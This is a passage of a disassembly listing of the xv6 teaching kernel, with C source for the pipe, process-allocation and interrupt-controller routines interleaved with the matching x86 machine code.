80100370 <panic> ismp = 0; break; } } if(!ismp) panic("Didn't find a suitable machine"); 801031b1: 83 ec 0c sub $0xc,%esp 801031b4: 68 bc 76 10 80 push $0x801076bc 801031b9: e8 b2 d1 ff ff call 80100370 <panic> 801031be: 66 90 xchg %ax,%ax case MPIOINTR: case MPLINTR: p += 8; continue; default: ismp = 0; 801031c0: 31 db xor %ebx,%ebx 801031c2: e9 30 ff ff ff jmp 801030f7 <mpinit+0xf7> 801031c7: 66 90 xchg %ax,%ax 801031c9: 66 90 xchg %ax,%ax 801031cb: 66 90 xchg %ax,%ax 801031cd: 66 90 xchg %ax,%ax 801031cf: 90 nop 801031d0 <picinit>: #define IO_PIC2 0xA0 // Slave (IRQs 8-15) // Don't use the 8259A interrupt controllers. Xv6 assumes SMP hardware. void picinit(void) { 801031d0: 55 push %ebp 801031d1: ba 21 00 00 00 mov $0x21,%edx 801031d6: b8 ff ff ff ff mov $0xffffffff,%eax 801031db: 89 e5 mov %esp,%ebp 801031dd: ee out %al,(%dx) 801031de: ba a1 00 00 00 mov $0xa1,%edx 801031e3: ee out %al,(%dx) // mask all interrupts outb(IO_PIC1+1, 0xFF); outb(IO_PIC2+1, 0xFF); } 801031e4: 5d pop %ebp 801031e5: c3 ret 801031e6: 66 90 xchg %ax,%ax 801031e8: 66 90 xchg %ax,%ax 801031ea: 66 90 xchg %ax,%ax 801031ec: 66 90 xchg %ax,%ax 801031ee: 66 90 xchg %ax,%ax 801031f0 <pipealloc>: int writeopen; // write fd is still open }; int pipealloc(struct file **f0, struct file **f1) { 801031f0: 55 push %ebp 801031f1: 89 e5 mov %esp,%ebp 801031f3: 57 push %edi 801031f4: 56 push %esi 801031f5: 53 push %ebx 801031f6: 83 ec 0c sub $0xc,%esp 801031f9: 8b 75 08 mov 0x8(%ebp),%esi 801031fc: 8b 5d 0c mov 0xc(%ebp),%ebx struct pipe *p; p = 0; *f0 = *f1 = 0; 801031ff: c7 03 00 00 00 00 movl $0x0,(%ebx) 80103205: c7 06 00 00 00 00 movl $0x0,(%esi) if((*f0 = filealloc()) == 0 || (*f1 = filealloc()) == 0) 8010320b: e8 60 db ff ff call 80100d70 <filealloc> 80103210: 85 c0 test %eax,%eax 80103212: 89 06 mov %eax,(%esi) 80103214: 0f 84 a8 00 00 00 je 801032c2 <pipealloc+0xd2> 8010321a: e8 51 db ff ff call 80100d70 <filealloc> 8010321f: 85 c0 test %eax,%eax 80103221: 89 03 mov %eax,(%ebx) 80103223: 0f 84 87 00 00 00 je 801032b0 <pipealloc+0xc0> goto bad; if((p = (struct pipe*)kalloc()) == 0) 80103229: e8 62 f2 ff ff call 80102490 <kalloc> 8010322e: 85 c0 test %eax,%eax 80103230: 89 c7 mov %eax,%edi 80103232: 0f 84 b0 00 00 00 je 801032e8 <pipealloc+0xf8> goto bad; p->readopen = 1; p->writeopen = 1; p->nwrite = 0; p->nread = 0; initlock(&p->lock, "pipe"); 80103238: 83 ec 08 sub $0x8,%esp *f0 = *f1 = 0; if((*f0 = filealloc()) == 0 || (*f1 = filealloc()) == 0) goto bad; if((p = (struct pipe*)kalloc()) == 0) goto bad; p->readopen = 1; 8010323b: c7 80 3c 02 00 00 01 movl $0x1,0x23c(%eax) 80103242: 00 00 00 p->writeopen = 1; 80103245: c7 80 40 02 00 00 01 movl $0x1,0x240(%eax) 8010324c: 00 00 00 p->nwrite = 0; 8010324f: c7 80 38 02 00 00 00 movl $0x0,0x238(%eax) 80103256: 00 00 00 p->nread = 0; 80103259: c7 80 34 02 00 00 00 movl $0x0,0x234(%eax) 80103260: 00 00 00 initlock(&p->lock, "pipe"); 80103263: 68 f0 76 10 80 push $0x801076f0 80103268: 50 push %eax 80103269: e8 b2 11 00 00 call 80104420 <initlock> (*f0)->type = FD_PIPE; 8010326e: 8b 06 mov (%esi),%eax (*f0)->pipe = p; (*f1)->type = FD_PIPE; (*f1)->readable = 0; (*f1)->writable = 1; (*f1)->pipe = p; return 0; 80103270: 83 c4 10 add $0x10,%esp p->readopen = 1; p->writeopen = 1; p->nwrite = 0; p->nread = 0; initlock(&p->lock, "pipe"); (*f0)->type = FD_PIPE; 80103273: c7 00 01 00 00 00 movl $0x1,(%eax) (*f0)->readable = 1; 80103279: 8b 06 mov (%esi),%eax 8010327b: c6 40 08 01 movb $0x1,0x8(%eax) (*f0)->writable = 0; 8010327f: 8b 06 mov (%esi),%eax 80103281: c6 40 09 00 movb $0x0,0x9(%eax) (*f0)->pipe = p; 80103285: 8b 06 mov (%esi),%eax 80103287: 89 78 0c mov %edi,0xc(%eax) (*f1)->type = FD_PIPE; 8010328a: 8b 03 mov (%ebx),%eax 8010328c: c7 00 01 00 00 00 movl $0x1,(%eax) (*f1)->readable = 0; 80103292: 8b 03 mov (%ebx),%eax 80103294: c6 40 08 00 movb $0x0,0x8(%eax) (*f1)->writable = 1; 80103298: 8b 03 mov (%ebx),%eax 8010329a: c6 40 09 01 movb $0x1,0x9(%eax) (*f1)->pipe = p; 8010329e: 8b 03 mov (%ebx),%eax 801032a0: 89 78 0c mov %edi,0xc(%eax) if(*f0) fileclose(*f0); if(*f1) fileclose(*f1); return -1; } 801032a3: 8d 65 f4 lea -0xc(%ebp),%esp (*f0)->pipe = p; (*f1)->type = FD_PIPE; (*f1)->readable = 0; (*f1)->writable = 1; (*f1)->pipe = p; return 0; 801032a6: 31 c0 xor %eax,%eax if(*f0) fileclose(*f0); if(*f1) fileclose(*f1); return -1; } 801032a8: 5b pop %ebx 801032a9: 5e pop %esi 801032aa: 5f pop %edi 801032ab: 5d pop %ebp 801032ac: c3 ret 801032ad: 8d 76 00 lea 0x0(%esi),%esi //PAGEBREAK: 20 bad: if(p) kfree((char*)p); if(*f0) 801032b0: 8b 06 mov (%esi),%eax 801032b2: 85 c0 test %eax,%eax 801032b4: 74 1e je 801032d4 <pipealloc+0xe4> fileclose(*f0); 801032b6: 83 ec 0c sub $0xc,%esp 801032b9: 50 push %eax 801032ba: e8 71 db ff ff call 80100e30 <fileclose> 801032bf: 83 c4 10 add $0x10,%esp if(*f1) 801032c2: 8b 03 mov (%ebx),%eax 801032c4: 85 c0 test %eax,%eax 801032c6: 74 0c je 801032d4 <pipealloc+0xe4> fileclose(*f1); 801032c8: 83 ec 0c sub $0xc,%esp 801032cb: 50 push %eax 801032cc: e8 5f db ff ff call 80100e30 <fileclose> 801032d1: 83 c4 10 add $0x10,%esp return -1; } 801032d4: 8d 65 f4 lea -0xc(%ebp),%esp kfree((char*)p); if(*f0) fileclose(*f0); if(*f1) fileclose(*f1); return -1; 801032d7: b8 ff ff ff ff mov $0xffffffff,%eax } 801032dc: 5b pop %ebx 801032dd: 5e pop %esi 801032de: 5f pop %edi 801032df: 5d pop %ebp 801032e0: c3 ret 801032e1: 8d b4 26 00 00 00 00 lea 0x0(%esi,%eiz,1),%esi //PAGEBREAK: 20 bad: if(p) kfree((char*)p); if(*f0) 801032e8: 8b 06 mov (%esi),%eax 801032ea: 85 c0 test %eax,%eax 801032ec: 75 c8 jne 801032b6 <pipealloc+0xc6> 801032ee: eb d2 jmp 801032c2 <pipealloc+0xd2> 801032f0 <pipeclose>: return -1; } void pipeclose(struct pipe *p, int writable) { 801032f0: 55 push %ebp 801032f1: 89 e5 mov %esp,%ebp 801032f3: 56 push %esi 801032f4: 53 push %ebx 801032f5: 8b 5d 08 mov 0x8(%ebp),%ebx 801032f8: 8b 75 0c mov 0xc(%ebp),%esi acquire(&p->lock); 801032fb: 83 ec 0c sub $0xc,%esp 801032fe: 53 push %ebx 801032ff: e8 1c 12 00 00 call 80104520 <acquire> if(writable){ 80103304: 83 c4 10 add $0x10,%esp 80103307: 85 f6 test %esi,%esi 80103309: 74 45 je 80103350 <pipeclose+0x60> p->writeopen = 0; wakeup(&p->nread); 8010330b: 8d 83 34 02 00 00 lea 0x234(%ebx),%eax 80103311: 83 ec 0c sub $0xc,%esp void pipeclose(struct pipe *p, int writable) { acquire(&p->lock); if(writable){ p->writeopen = 0; 80103314: c7 83 40 02 00 00 00 movl $0x0,0x240(%ebx) 8010331b: 00 00 00 wakeup(&p->nread); 8010331e: 50 push %eax 8010331f: e8 bc 0b 00 00 call 80103ee0 <wakeup> 80103324: 83 c4 10 add $0x10,%esp } else { p->readopen = 0; wakeup(&p->nwrite); } if(p->readopen == 0 && p->writeopen == 0){ 80103327: 8b 93 3c 02 00 00 mov 0x23c(%ebx),%edx 8010332d: 85 d2 test %edx,%edx 8010332f: 75 0a jne 8010333b <pipeclose+0x4b> 80103331: 8b 83 40 02 00 00 mov 0x240(%ebx),%eax 80103337: 85 c0 test %eax,%eax 80103339: 74 35 je 80103370 <pipeclose+0x80> release(&p->lock); kfree((char*)p); } else release(&p->lock); 8010333b: 89 5d 08 mov %ebx,0x8(%ebp) } 8010333e: 8d 65 f8 lea -0x8(%ebp),%esp 80103341: 5b pop %ebx 80103342: 5e pop %esi 80103343: 5d pop %ebp } if(p->readopen == 0 && p->writeopen == 0){ release(&p->lock); kfree((char*)p); } else release(&p->lock); 80103344: e9 f7 12 00 00 jmp 80104640 <release> 80103349: 8d b4 26 00 00 00 00 lea 0x0(%esi,%eiz,1),%esi if(writable){ p->writeopen = 0; wakeup(&p->nread); } else { p->readopen = 0; wakeup(&p->nwrite); 80103350: 8d 83 38 02 00 00 lea 0x238(%ebx),%eax 80103356: 83 ec 0c sub $0xc,%esp acquire(&p->lock); if(writable){ p->writeopen = 0; wakeup(&p->nread); } else { p->readopen = 0; 80103359: c7 83 3c 02 00 00 00 movl $0x0,0x23c(%ebx) 80103360: 00 00 00 wakeup(&p->nwrite); 80103363: 50 push %eax 80103364: e8 77 0b 00 00 call 80103ee0 <wakeup> 80103369: 83 c4 10 add $0x10,%esp 8010336c: eb b9 jmp 80103327 <pipeclose+0x37> 8010336e: 66 90 xchg %ax,%ax } if(p->readopen == 0 && p->writeopen == 0){ release(&p->lock); 80103370: 83 ec 0c sub $0xc,%esp 80103373: 53 push %ebx 80103374: e8 c7 12 00 00 call 80104640 <release> kfree((char*)p); 80103379: 89 5d 08 mov %ebx,0x8(%ebp) 8010337c: 83 c4 10 add $0x10,%esp } else release(&p->lock); } 8010337f: 8d 65 f8 lea -0x8(%ebp),%esp 80103382: 5b pop %ebx 80103383: 5e pop %esi 80103384: 5d pop %ebp p->readopen = 0; wakeup(&p->nwrite); } if(p->readopen == 0 && p->writeopen == 0){ release(&p->lock); kfree((char*)p); 80103385: e9 56 ef ff ff jmp 801022e0 <kfree> 8010338a: 8d b6 00 00 00 00 lea 0x0(%esi),%esi 80103390 <pipewrite>: } //PAGEBREAK: 40 int pipewrite(struct pipe *p, char *addr, int n) { 80103390: 55 push %ebp 80103391: 89 e5 mov %esp,%ebp 80103393: 57 push %edi 80103394: 56 push %esi 80103395: 53 push %ebx 80103396: 83 ec 28 sub $0x28,%esp 80103399: 8b 5d 08 mov 0x8(%ebp),%ebx int i; acquire(&p->lock); 8010339c: 53 push %ebx 8010339d: e8 7e 11 00 00 call 80104520 <acquire> for(i = 0; i < n; i++){ 801033a2: 8b 45 10 mov 0x10(%ebp),%eax 801033a5: 83 c4 10 add $0x10,%esp 801033a8: 85 c0 test %eax,%eax 801033aa: 0f 8e b9 00 00 00 jle 80103469 <pipewrite+0xd9> 801033b0: 8b 4d 0c mov 0xc(%ebp),%ecx 801033b3: 8b 83 38 02 00 00 mov 0x238(%ebx),%eax while(p->nwrite == p->nread + PIPESIZE){ //DOC: pipewrite-full if(p->readopen == 0 || myproc()->killed){ release(&p->lock); return -1; } wakeup(&p->nread); 801033b9: 8d bb 34 02 00 00 lea 0x234(%ebx),%edi sleep(&p->nwrite, &p->lock); //DOC: pipewrite-sleep 801033bf: 8d b3 38 02 00 00 lea 0x238(%ebx),%esi 801033c5: 89 4d e4 mov %ecx,-0x1c(%ebp) 801033c8: 03 4d 10 add 0x10(%ebp),%ecx 801033cb: 89 4d e0 mov %ecx,-0x20(%ebp) { int i; acquire(&p->lock); for(i = 0; i < n; i++){ while(p->nwrite == p->nread + PIPESIZE){ //DOC: pipewrite-full 801033ce: 8b 8b 34 02 00 00 mov 0x234(%ebx),%ecx 801033d4: 8d 91 00 02 00 00 lea 0x200(%ecx),%edx 801033da: 39 d0 cmp %edx,%eax 801033dc: 74 38 je 80103416 <pipewrite+0x86> 801033de: eb 59 jmp 80103439 <pipewrite+0xa9> if(p->readopen == 0 || myproc()->killed){ 801033e0: e8 9b 03 00 00 call 80103780 <myproc> 801033e5: 8b 48 24 mov 0x24(%eax),%ecx 801033e8: 85 c9 test %ecx,%ecx 801033ea: 75 34 jne 80103420 <pipewrite+0x90> release(&p->lock); return -1; } wakeup(&p->nread); 801033ec: 83 ec 0c sub $0xc,%esp 801033ef: 57 push %edi 801033f0: e8 eb 0a 00 00 call 80103ee0 <wakeup> sleep(&p->nwrite, &p->lock); //DOC: pipewrite-sleep 801033f5: 58 pop %eax 801033f6: 5a pop %edx 801033f7: 53 push %ebx 801033f8: 56 push %esi 801033f9: e8 32 09 00 00 call 80103d30 <sleep> { int i; acquire(&p->lock); for(i = 0; i < n; i++){ while(p->nwrite == p->nread + PIPESIZE){ //DOC: pipewrite-full 801033fe: 8b 83 34 02 00 00 mov 0x234(%ebx),%eax 80103404: 8b 93 38 02 00 00 mov 0x238(%ebx),%edx 8010340a: 83 c4 10 add $0x10,%esp 8010340d: 05 00 02 00 00 add $0x200,%eax 80103412: 39 c2 cmp %eax,%edx 80103414: 75 2a jne 80103440 <pipewrite+0xb0> if(p->readopen == 0 || myproc()->killed){ 80103416: 8b 83 3c 02 00 00 mov 0x23c(%ebx),%eax 8010341c: 85 c0 test %eax,%eax 8010341e: 75 c0 jne 801033e0 <pipewrite+0x50> release(&p->lock); 80103420: 83 ec 0c sub $0xc,%esp 80103423: 53 push %ebx 80103424: e8 17 12 00 00 call 80104640 <release> return -1; 80103429: 83 c4 10 add $0x10,%esp 8010342c: b8 ff ff ff ff mov $0xffffffff,%eax p->data[p->nwrite++ % PIPESIZE] = addr[i]; } wakeup(&p->nread); //DOC: pipewrite-wakeup1 release(&p->lock); return n; } 80103431: 8d 65 f4 lea -0xc(%ebp),%esp 80103434: 5b pop %ebx 80103435: 5e pop %esi 80103436: 5f pop %edi 80103437: 5d pop %ebp 80103438: c3 ret { int i; acquire(&p->lock); for(i = 0; i < n; i++){ while(p->nwrite == p->nread + PIPESIZE){ //DOC: pipewrite-full 80103439: 89 c2 mov %eax,%edx 8010343b: 90 nop 8010343c: 8d 74 26 00 lea 0x0(%esi,%eiz,1),%esi return -1; } wakeup(&p->nread); sleep(&p->nwrite, &p->lock); //DOC: pipewrite-sleep } p->data[p->nwrite++ % PIPESIZE] = addr[i]; 80103440: 8b 4d e4 mov -0x1c(%ebp),%ecx 80103443: 8d 42 01 lea 0x1(%edx),%eax 80103446: 83 45 e4 01 addl $0x1,-0x1c(%ebp) 8010344a: 81 e2 ff 01 00 00 and $0x1ff,%edx 80103450: 89 83 38 02 00 00 mov %eax,0x238(%ebx) 80103456: 0f b6 09 movzbl (%ecx),%ecx 80103459: 88 4c 13 34 mov %cl,0x34(%ebx,%edx,1) 8010345d: 8b 4d e4 mov -0x1c(%ebp),%ecx pipewrite(struct pipe *p, char *addr, int n) { int i; acquire(&p->lock); for(i = 0; i < n; i++){ 80103460: 3b 4d e0 cmp -0x20(%ebp),%ecx 80103463: 0f 85 65 ff ff ff jne 801033ce <pipewrite+0x3e> wakeup(&p->nread); sleep(&p->nwrite, &p->lock); //DOC: pipewrite-sleep } p->data[p->nwrite++ % PIPESIZE] = addr[i]; } wakeup(&p->nread); //DOC: pipewrite-wakeup1 80103469: 8d 83 34 02 00 00 lea 0x234(%ebx),%eax 8010346f: 83 ec 0c sub $0xc,%esp 80103472: 50 push %eax 80103473: e8 68 0a 00 00 call 80103ee0 <wakeup> release(&p->lock); 80103478: 89 1c 24 mov %ebx,(%esp) 8010347b: e8 c0 11 00 00 call 80104640 <release> return n; 80103480: 83 c4 10 add $0x10,%esp 80103483: 8b 45 10 mov 0x10(%ebp),%eax 80103486: eb a9 jmp 80103431 <pipewrite+0xa1> 80103488: 90 nop 80103489: 8d b4 26 00 00 00 00 lea 0x0(%esi,%eiz,1),%esi 80103490 <piperead>: } int piperead(struct pipe *p, char *addr, int n) { 80103490: 55 push %ebp 80103491: 89 e5 mov %esp,%ebp 80103493: 57 push %edi 80103494: 56 push %esi 80103495: 53 push %ebx 80103496: 83 ec 18 sub $0x18,%esp 80103499: 8b 5d 08 mov 0x8(%ebp),%ebx 8010349c: 8b 7d 0c mov 0xc(%ebp),%edi int i; acquire(&p->lock); 8010349f: 53 push %ebx 801034a0: e8 7b 10 00 00 call 80104520 <acquire> while(p->nread == p->nwrite && p->writeopen){ //DOC: pipe-empty 801034a5: 83 c4 10 add $0x10,%esp 801034a8: 8b 83 34 02 00 00 mov 0x234(%ebx),%eax 801034ae: 39 83 38 02 00 00 cmp %eax,0x238(%ebx) 801034b4: 75 6a jne 80103520 <piperead+0x90> 801034b6: 8b b3 40 02 00 00 mov 0x240(%ebx),%esi 801034bc: 85 f6 test %esi,%esi 801034be: 0f 84 cc 00 00 00 je 80103590 <piperead+0x100> if(myproc()->killed){ release(&p->lock); return -1; } sleep(&p->nread, &p->lock); //DOC: piperead-sleep 801034c4: 8d b3 34 02 00 00 lea 0x234(%ebx),%esi 801034ca: eb 2d jmp 801034f9 <piperead+0x69> 801034cc: 8d 74 26 00 lea 0x0(%esi,%eiz,1),%esi 801034d0: 83 ec 08 sub $0x8,%esp 801034d3: 53 push %ebx 801034d4: 56 push %esi 801034d5: e8 56 08 00 00 call 80103d30 <sleep> piperead(struct pipe *p, char *addr, int n) { int i; acquire(&p->lock); while(p->nread == p->nwrite && p->writeopen){ //DOC: pipe-empty 801034da: 83 c4 10 add $0x10,%esp 801034dd: 8b 83 38 02 00 00 mov 0x238(%ebx),%eax 801034e3: 39 83 34 02 00 00 cmp %eax,0x234(%ebx) 801034e9: 75 35 jne 80103520 <piperead+0x90> 801034eb: 8b 93 40 02 00 00 mov 0x240(%ebx),%edx 801034f1: 85 d2 test %edx,%edx 801034f3: 0f 84 97 00 00 00 je 80103590 <piperead+0x100> if(myproc()->killed){ 801034f9: e8 82 02 00 00 call 80103780 <myproc> 801034fe: 8b 48 24 mov 0x24(%eax),%ecx 80103501: 85 c9 test %ecx,%ecx 80103503: 74 cb je 801034d0 <piperead+0x40> release(&p->lock); 80103505: 83 ec 0c sub $0xc,%esp 80103508: 53 push %ebx 80103509: e8 32 11 00 00 call 80104640 <release> return -1; 8010350e: 83 c4 10 add $0x10,%esp addr[i] = p->data[p->nread++ % PIPESIZE]; } wakeup(&p->nwrite); //DOC: piperead-wakeup release(&p->lock); return i; } 80103511: 8d 65 f4 lea -0xc(%ebp),%esp acquire(&p->lock); while(p->nread == p->nwrite && p->writeopen){ //DOC: pipe-empty if(myproc()->killed){ release(&p->lock); return -1; 80103514: b8 ff ff ff ff mov $0xffffffff,%eax addr[i] = p->data[p->nread++ % PIPESIZE]; } wakeup(&p->nwrite); //DOC: piperead-wakeup release(&p->lock); return i; } 80103519: 5b pop %ebx 8010351a: 5e pop %esi 8010351b: 5f pop %edi 8010351c: 5d pop %ebp 8010351d: c3 ret 8010351e: 66 90 xchg %ax,%ax release(&p->lock); return -1; } sleep(&p->nread, &p->lock); //DOC: piperead-sleep } for(i = 0; i < n; i++){ //DOC: piperead-copy 80103520: 8b 45 10 mov 0x10(%ebp),%eax 80103523: 85 c0 test %eax,%eax 80103525: 7e 69 jle 80103590 <piperead+0x100> if(p->nread == p->nwrite) 80103527: 8b 83 34 02 00 00 mov 0x234(%ebx),%eax 8010352d: 31 c9 xor %ecx,%ecx 8010352f: eb 15 jmp 80103546 <piperead+0xb6> 80103531: 8d b4 26 00 00 00 00 lea 0x0(%esi,%eiz,1),%esi 80103538: 8b 83 34 02 00 00 mov 0x234(%ebx),%eax 8010353e: 3b 83 38 02 00 00 cmp 0x238(%ebx),%eax 80103544: 74 5a je 801035a0 <piperead+0x110> break; addr[i] = p->data[p->nread++ % PIPESIZE]; 80103546: 8d 70 01 lea 0x1(%eax),%esi 80103549: 25 ff 01 00 00 and $0x1ff,%eax 8010354e: 89 b3 34 02 00 00 mov %esi,0x234(%ebx) 80103554: 0f b6 44 03 34 movzbl 0x34(%ebx,%eax,1),%eax 80103559: 88 04 0f mov %al,(%edi,%ecx,1) release(&p->lock); return -1; } sleep(&p->nread, &p->lock); //DOC: piperead-sleep } for(i = 0; i < n; i++){ //DOC: piperead-copy 8010355c: 83 c1 01 add $0x1,%ecx 8010355f: 39 4d 10 cmp %ecx,0x10(%ebp) 80103562: 75 d4 jne 80103538 <piperead+0xa8> if(p->nread == p->nwrite) break; addr[i] = p->data[p->nread++ % PIPESIZE]; } wakeup(&p->nwrite); //DOC: piperead-wakeup 80103564: 8d 83 38 02 00 00 lea 0x238(%ebx),%eax 8010356a: 83 ec 0c sub $0xc,%esp 8010356d: 50 push %eax 8010356e: e8 6d 09 00 00 call 80103ee0 <wakeup> release(&p->lock); 80103573: 89 1c 24 mov %ebx,(%esp) 80103576: e8 c5 10 00 00 call 80104640 <release> return i; 8010357b: 8b 45 10 mov 0x10(%ebp),%eax 8010357e: 83 c4 10 add $0x10,%esp } 80103581: 8d 65 f4 lea -0xc(%ebp),%esp 80103584: 5b pop %ebx 80103585: 5e pop %esi 80103586: 5f pop %edi 80103587: 5d pop %ebp 80103588: c3 ret 80103589: 8d b4 26 00 00 00 00 lea 0x0(%esi,%eiz,1),%esi release(&p->lock); return -1; } sleep(&p->nread, &p->lock); //DOC: piperead-sleep } for(i = 0; i < n; i++){ //DOC: piperead-copy 80103590: c7 45 10 00 00 00 00 movl $0x0,0x10(%ebp) 80103597: eb cb jmp 80103564 <piperead+0xd4> 80103599: 8d b4 26 00 00 00 00 lea 0x0(%esi,%eiz,1),%esi 801035a0: 89 4d 10 mov %ecx,0x10(%ebp) 801035a3: eb bf jmp 80103564 <piperead+0xd4> 801035a5: 66 90 xchg %ax,%ax 801035a7: 66 90 xchg %ax,%ax 801035a9: 66 90 xchg %ax,%ax 801035ab: 66 90 xchg %ax,%ax 801035ad: 66 90 xchg %ax,%ax 801035af: 90 nop 801035b0 <allocproc>: // If found, change state to EMBRYO and initialize // state required to run in the kernel. // Otherwise return 0. static struct proc* allocproc(void) { 801035b0: 55 push %ebp 801035b1: 89 e5 mov %esp,%ebp 801035b3: 53 push %ebx struct proc *p; char *sp; acquire(&ptable.lock); for(p = ptable.proc; p < &ptable.proc[NPROC]; p++) 801035b4: bb 74 35 11 80 mov $0x80113574,%ebx // If found, change state to EMBRYO and initialize // state required to run in the kernel. // Otherwise return 0. static struct proc* allocproc(void) { 801035b9: 83 ec 10 sub $0x10,%esp struct proc *p; char *sp; acquire(&ptable.lock); 801035bc: 68 40 35 11 80 push $0x80113540 801035c1: e8 5a 0f 00 00 call 80104520 <acquire> 801035c6: 83 c4 10 add $0x10,%esp 801035c9: eb 10 jmp 801035db <allocproc+0x2b> 801035cb: 90 nop 801035cc: 8d 74 26 00 lea 0x0(%esi,%eiz,1),%esi for(p = ptable.proc; p < &ptable.proc[NPROC]; p++) 801035d0: 83 c3 7c add $0x7c,%ebx 801035d3: 81 fb 74 54 11 80 cmp $0x80115474,%ebx 801035d9: 74 75 je 80103650 <allocproc+0xa0> if(p->state == UNUSED) 801035db: 8b 43 0c mov 0xc(%ebx),%eax 801035de: 85 c0 test %eax,%eax 801035e0: 75 ee jne 801035d0 <allocproc+0x20> release(&ptable.lock); return 0; found: p->state = EMBRYO; p->pid = nextpid++; 801035e2: a1 04 a0 10 80 mov 0x8010a004,%eax release(&ptable.lock); 801035e7: 83 ec 0c sub $0xc,%esp release(&ptable.lock); return 0; found: p->state = EMBRYO; 801035ea: c7 43 0c 01 00 00 00 movl $0x1,0xc(%ebx) p->pid = nextpid++; release(&ptable.lock); 801035f1: 68 40 35 11 80 push $0x80113540 release(&ptable.lock); return 0; found: p->state = EMBRYO; p->pid = nextpid++; 801035f6: 8d 50 01 lea 0x1(%eax),%edx 801035f9: 89 43 10 mov %eax,0x10(%ebx) 801035fc: 89 15 04 a0 10 80 mov %edx,0x8010a004 release(&ptable.lock); 80103602: e8 39 10 00 00 call 80104640 <release> // Allocate kernel stack. if((p->kstack = kalloc()) == 0){ 80103607: e8 84 ee ff ff call 80102490 <kalloc> 8010360c: 83 c4 10 add $0x10,%esp 8010360f: 85 c0 test %eax,%eax 80103611: 89 43 08 mov %eax,0x8(%ebx) 80103614: 74 51 je 80103667 <allocproc+0xb7> return 0; } sp = p->kstack + KSTACKSIZE; // Leave room for trap frame. sp -= sizeof *p->tf; 80103616: 8d 90 b4 0f 00 00 lea 0xfb4(%eax),%edx sp -= 4; *(uint*)sp = (uint)trapret; sp -= sizeof *p->context; p->context = (struct context*)sp; memset(p->context, 0, sizeof *p->context); 8010361c: 83 ec 04 sub $0x4,%esp // Set up new context to start executing at forkret, // which returns to trapret. sp -= 4; *(uint*)sp = (uint)trapret; sp -= sizeof *p->context; 8010361f: 05 9c 0f 00 00 add $0xf9c,%eax return 0; } sp = p->kstack + KSTACKSIZE; // Leave room for trap frame. sp -= sizeof *p->tf; 80103624: 89 53 18 mov %edx,0x18(%ebx) p->tf = (struct trapframe*)sp; // Set up new context to start executing at forkret, // which returns to trapret. sp -= 4; *(uint*)sp = (uint)trapret; 80103627: c7 40 14 b1 58 10 80 movl $0x801058b1,0x14(%eax) sp -= sizeof *p->context; p->context = (struct context*)sp; memset(p->context, 0, sizeof *p->context); 8010362e: 6a 14 push $0x14 80103630: 6a 00 push $0x0 80103632: 50 push %eax // which returns to trapret. sp -= 4; *(uint*)sp = (uint)trapret; sp -= sizeof *p->context; p->context = (struct context*)sp; 80103633: 89 43 1c mov %eax,0x1c(%ebx) memset(p->context, 0, sizeof *p->context); 80103636: e8 55 10 00 00 call 80104690 <memset> p->context->eip = (uint)forkret; 8010363b: 8b 43 1c mov 0x1c(%ebx),%eax return p; 8010363e: 83 c4 10 add $0x10,%esp *(uint*)sp = (uint)trapret; sp -= sizeof *p->context; p->context = (struct context*)sp; memset(p->context, 0, sizeof *p->context); p->context->eip = (uint)forkret; 80103641: c7 40 10 70 36 10 80 movl $0x80103670,0x10(%eax) return p; 80103648: 89 d8 mov %ebx,%eax } 8010364a: 8b 5d fc mov -0x4(%ebp),%ebx 8010364d: c9 leave 8010364e: c3 ret 8010364f: 90 nop for(p = ptable.proc; p < &ptable.proc[NPROC]; p++) if(p->state == UNUSED) goto found; release(&ptable.lock); 80103650: 83 ec 0c sub $0xc,%esp 80103653: 68 40 35 11 80 push $0x80113540 80103658: e8 e3 0f 00 00 call 80104640 <release> return 0; 8010365d: 83 c4 10 add $0x10,%esp 80103660: 31 c0 xor %eax,%eax p->context = (struct context*)sp; memset(p->context, 0, sizeof *p->context); p->context->eip = (uint)forkret; return p; } 80103662: 8b 5d fc mov -0x4(%ebp),%ebx 80103665: c9 leave 80103666: c3 ret release(&ptable.lock); // Allocate kernel stack. if((p->kstack = kalloc()) == 0){ p->state = UNUSED; 80103667: c7 43 0c 00 00 00 00 movl $0x0,0xc(%ebx) return 0; 8010366e: eb da jmp 8010364a <allocproc+0x9a> 80103670 <forkret>: // A fork child's very first scheduling by scheduler() // will swtch here. "Return" to user space. void forkret(void) { 80103670: 55 push %ebp 80103671: 89 e5 mov %esp,%ebp 80103673: 83 ec 14 sub $0x14,%esp static int first = 1; // Still holding ptable.lock from scheduler. release(&ptable.lock); 80103676: 68 40 35 11 80 push $0x80113540 8010367b: e8 c0 0f 00 00 call 80104640 <release> if (first) { 80103680: a1 00 a0 10 80 mov 0x8010a000,%eax 80103685: 83 c4 10 add $0x10,%esp 80103688: 85 c0 test %eax,%eax 8010368a: 75 04 jne 80103690 <forkret+0x20> iinit(ROOTDEV); initlog(ROOTDEV); } // Return to "caller", actually trapret (see allocproc). } 8010368c: c9 leave 8010368d: c3 ret 8010368e: 66 90 xchg %ax,%ax if (first) { // Some initialization functions must be run in the context // of a regular process (e.g., they call sleep), and thus cannot // be run from main(). first = 0; iinit(ROOTDEV); 80103690: 83 ec 0c sub $0xc,%esp if (first) { // Some initialization functions must be run in the context // of a regular process (e.g., they call sleep), and thus cannot // be run from main(). first = 0; 80103693: c7 05 00 a0 10 80 00 movl $0x0,0x8010a000 8010369a: 00 00 00 iinit(ROOTDEV); 8010369d: 6a 01 push $0x1 8010369f: e8 cc dd ff ff call 80101470 <iinit> initlog(ROOTDEV); 801036a4: c7 04 24 01 00 00 00 movl $0x1,(%esp) 801036ab: e8 00 f4 ff ff call 80102ab0 <initlog> 801036b0: 83 c4 10 add $0x10,%esp } // Return to "caller", actually trapret (see allocproc). } 801036b3: c9 leave 801036b4: c3 ret 801036b5: 8d 74 26 00 lea 0x0(%esi,%eiz,1),%esi 801036b9: 8d bc 27 00 00 00 00 lea 0x0(%edi,%eiz,1),%edi 801036c0 <pinit>: static void wakeup1(void *chan); void pinit(void) { 801036c0: 55 push %ebp 801036c1: 89 e5 mov %esp,%ebp 801036c3: 83 ec 10 sub $0x10,%esp initlock(&ptable.lock, "ptable"); 801036c6: 68 f5 76 10 80 push $0x801076f5 801036cb: 68 40 35 11 80 push $0x80113540 801036d0: e8 4b 0d 00 00 call 80104420 <initlock> } 801036d5: 83 c4 10 add $0x10,%esp 801036d8: c9 leave 801036d9: c3 ret 801036da: 8d b6 00 00 00 00 lea 0x0(%esi),%esi 801036e0 <mycpu>: // Must be called with interrupts disabled to avoid the caller being // rescheduled between reading lapicid and running through the loop. struct cpu* mycpu(void) { 801036e0: 55 push %ebp 801036e1: 89 e5 mov %esp,%ebp 801036e3: 56 push %esi 801036e4: 